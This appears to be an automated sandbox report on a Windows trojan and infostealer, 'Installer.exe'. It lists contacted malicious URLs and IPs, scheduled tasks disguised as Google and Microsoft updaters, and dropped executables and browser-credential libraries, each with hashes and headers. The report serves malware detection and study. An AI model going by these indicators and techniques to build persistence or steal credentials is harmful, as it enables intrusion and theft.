https://api.peer2profit.com/api/proxy/nodes/getC	GoogleUpdate.exe, 00000022.00000002.642565365.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/	GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.460081266.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.454959829.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.452830772.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.498202955.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/get?	GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.508678490.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000002.635713610.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	uHCH8yr185HV.0.dr	false		high
https://mozilla.org0	softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	false	URL Reputation: safe	unknown
http://89.208.137.159:5200/add/	NtjHIfvQ.exe, 00000026.00000000.418888159.0000000000AC2000.00000002.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
http://www.idpminic.org/aula/hiuhehufw.exe1	Installer.exe, 00000000.00000002.469744760.0000000004720000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
51.195.77.248	unknown	France	16276	OVHFR	false
109.107.173.210	unknown	Russian Federation	49973	TELEPORT-TV-ASRU	true
172.66.40.196	api.peer2profit.com	United States	13335	CLOUDFLARENETUS	false
66.235.200.147	idpminic.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	777905
Start date and time:	2023-01-04 16:46:14 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Installer.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	71
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@107/43@2/4
EGA Information:	Successful, ratio: 36.4%
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Execution Graph export aborted for target GoogleUpdate.exe, PID 5852 because there are no executed function
Execution Graph export aborted for target Installer.exe, PID 2980 because there are no executed function
Execution Graph export aborted for target NtjHIfvQ.exe, PID 4744 because it is empty
Execution Graph export aborted for target OBH7JYJN.exe, PID 5136 because there are no executed function
Execution Graph export aborted for target OBH7JYJN.exe, PID 5856 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1716 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:47:44	API Interceptor	1x Sleep call for process: 1u8JL0XE.exe modified
16:47:48	API Interceptor	181x Sleep call for process: powershell.exe modified
16:47:58	API Interceptor	3x Sleep call for process: OBH7JYJN.exe modified
16:48:01	Task Scheduler	Run new task: GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe} path: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
16:48:14	API Interceptor	757x Sleep call for process: GoogleUpdate.exe modified
16:48:18	Task Scheduler	Run new task: GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5} path: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
16:48:18	API Interceptor	63x Sleep call for process: NtjHIfvQ.exe modified
16:48:24	Task Scheduler	Run new task: MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca} path: C:\Users\user\AppData\LocalLow\MfU3390p.exe
16:48:24	Task Scheduler	Run new task: MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} path: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe
16:49:26	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe

Process:	C:\Users\user\AppData\LocalLow\1u8JL0XE.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884609
Entropy (8bit):	7.915812566955318
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	EB27BB8CFA99D659E4FE023E9002ECD1
SHA1:	C783400302FDFAE0518269C5A5A8D4BAD29F42A3
SHA-256:	9C01D90543458567C4737731EE6754CC209E4BB78FF648EB75C4D23BE261EF2F
SHA-512:	AB5AD3C094ED1F094AA82D80D298E6D0AB15A94B58B007DBE8A6219FE8498569B5D9013D770BD9910F177F94F2639D84650655E8F60113051E98B386C49C36A2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884608
Entropy (8bit):	7.915813410181377
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	9253ED091D81E076A3037E12AF3DC871
SHA1:	EC02829A25B3BF57AD061BBE54180D0C99C76981
SHA-256:	78E0A8309BC850037E12C2D72A5B0843DCD8B412A0A597C2A3DCBD44E9F3C859
SHA-512:	29FF2FD5F150D10B2D281A45DF5B44873192605DE8DC95278D6A7B5053370E4AC64A47100B13C63F3C048DF351A9B51F0B93AF7D922399A91508A50C152E8CF4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\Users\user\AppData\LocalLow\429Z7OXjgaea

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\6KsQ7L4Hx3I5

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\994232qd0NPW

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.43613063485556663
Encrypted:	false
SSDEEP:	12:TLqlUIFnGP6Gkwtwhg4FdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0u9z3:TLqlj1czkwubXYFpFNYcw+6UwcYzHr
MD5:	46076967A4692D6323BCBDAD8532DA6A
SHA1:	A2C61F0EAECF8C2D126FCF82828808B78291E582
SHA-256:	BFA77719DCA9C4C92B38BD8A23C9DD751B82DB0F21620E6937C4F97AECC5536B
SHA-512:	B4C03F075B2E4DC527AD25B5D5788BE55D4CBCCA66002884CC75528FC57AF54C494B2219C726999E9A29C5AB05C789DB1412F4A01A8AC61726E2F7B785E77691
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\MfU3390p.exe

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	6.270431868500399
Encrypted:	false
SSDEEP:	1536:apyR0Fl1K6g0e8hsEvKAxtE4zo8Sw7Ky7NGHjQR54z5sW0cd/cbPpGA/uYEmsn:a9l1Ed8hsEfLoBw7p7B54p/uPpGA/VEr
MD5:	33DAD992607D0FFD44D2C81FE67F8FB1
SHA1:	E5B67DC05505FB1232504231F41CBA225C282D3C
SHA-256:	95903D8C2D48C4C0667E41878807F646F7648A33ED25D0EB433AAB41C25E31A4
SHA-512:	444973B44292C433A07E5F75F6580EA71799B1F835677BC5B2E42AF6B567A2F70F1B038F019D250A18216701CCF901B300632487EEBCC1113AC803EDB43159E4
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 80%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}f.I9...9...9....u..3....u.......u..-...kr......kr..(...kr..*....u..0...9...X....r..8....r=.8....r..8...Rich9...........................PE..L...oz~c.............................$............@.......................................@..................................L..d...............................L....?..8....................@.......?..@...............T............................text............................... ..`.rdata...d.......f..................@..@.data........`.......<..............@....rsrc................F..............@..@.reloc..L............H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	5.260084451666705
Encrypted:	false
SSDEEP:	768:f05Vx5qa/mytcR8D6Geg4bkTMyDFvxTJDsTX+GP:fgV2aHciTegKUFvJJDsr+K
MD5:	68E3359674EE7D49550B09E7FF69DCCE
SHA1:	BCB5D12FA5433EF5E4B78A4125EB77357E285908
SHA-256:	DD255D9CBCECED70A7FE5AE66133DE9C3333C72DE6E3D8A4D3F88A8A8108370D
SHA-512:	0E3D050A82DCDBD8F4688BE67DAD2AB9A2E054705BA6D176E381A0D1851202E1E75B7057E88099FB66D9475B20EBE0F5469AD058DDBE94C3EB29AA4100CC0098
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 85%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..f............... ........@.. ..............................h.....@.................................P...K.................................................................................... ............... ..H............text....e... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H.......dd... ...........'...<..........................................6.(.....(....z.,..{....,..{....o......(......s....}......(..... ... ....s....(.....r...po......(T...6..{4...oU....~5...-.r~..p.....(-...oG...sV....5...~5....~6......6...V(....r...p~6...oW...f.r...p}8....(T.....}8....sS....7....~9...-.r<..p.....(-...oG...sV....9...~9....~:......:....~;.....([...Vs!...(\...t.....;......0..8.......~....o....~....(.......+.....~.....o......X....i2...&......

C:\Users\user\AppData\LocalLow\OBH7JYJN.exe

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6436352
Entropy (8bit):	7.925338424673513
Encrypted:	false
SSDEEP:	196608:LZLecymZqT+XX9Atk+7TDhlXRZvYdtEA6OSwK:Nhyzy9AtpRZv2R6Oy
MD5:	AAEAD1169523638D40CA4D884E3D787A
SHA1:	E6C673B0D2569B0D9C21A82494EA9A5CD2F1B587
SHA-256:	09C92F58D9B11DB5D9A7E984CB3270BCC6DB79EA153DEA86788ECCAAA561D50C
SHA-512:	81BDE7C5632279473493F777733808FAA48ADA450DB174E3F0ED11E22505BFD5970C2022A135213ABF9FC2C1E2F047EAEE8428308C5E9DD9BB7842EDC2DECCC3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............s..s..s.q.p..s.q.v.,.s.q.w..s...v..s...w..s...p..s.q.r..s..r..s.c.z..s.c...s.c.q..s.Rich..s.........PE..L......c.................2....a......o.......P....@...........................b......Ub...@.................................D.\.(.... ].D?...................`b.h.....\.......................\.......\.@............P...............................text....0.......2.................. ..`.rdata..0.[..P....[..6..............@..@.data.........].......\.............@....rsrc...D?... ]..@....\.............@..@.reloc..h....`b......"b.............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	684984
Entropy (8bit):	6.857030838615762
Encrypted:	false
SSDEEP:	12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
MD5:	15B61E4A910C172B25FB7D8CCB92F754
SHA1:	5D9E319C7D47EB6D31AAED27707FE27A1665031C
SHA-256:	B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
SHA-512:	7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	627128
Entropy (8bit):	6.792651884784197
Encrypted:	false
SSDEEP:	12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
MD5:	F07D9977430E762B563EAADC2B94BBFA
SHA1:	DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
SHA-256:	4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
SHA-512:	6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	449280
Entropy (8bit):	6.670243582402913
Encrypted:	false
SSDEEP:	12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
MD5:	1FB93933FD087215A3C7B0800E6BB703
SHA1:	A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
SHA-256:	2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
SHA-512:	79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nss3.dll

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2042296
Entropy (8bit):	6.775178510549486
Encrypted:	false
SSDEEP:	49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
MD5:	F67D08E8C02574CBC2F1122C53BFB976
SHA1:	6522992957E7E4D074947CAD63189F308A80FCF2
SHA-256:	C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
SHA-512:	2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	254392
Entropy (8bit):	6.686038834818694
Encrypted:	false
SSDEEP:	6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
MD5:	63A1FE06BE877497C4C2017CA0303537
SHA1:	F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
SHA-256:	44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
SHA-512:	0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1099223
Entropy (8bit):	6.502588297211263
Encrypted:	false
SSDEEP:	24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
MD5:	DBF4F8DCEFB8056DC6BAE4B67FF810CE
SHA1:	BBAC1DD8A07C6069415C04B62747D794736D0689
SHA-256:	47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
SHA-512:	B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n................................... ...;...................................................................................text...............................`.P`.data...\|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..

C:\Users\user\AppData\LocalLow\uHCH8yr185HV

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80128
Entropy (8bit):	6.906674531653877
Encrypted:	false
SSDEEP:	1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
MD5:	1B171F9A428C44ACF85F89989007C328
SHA1:	6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
SHA-256:	9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
SHA-512:	99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
Malicious:	false
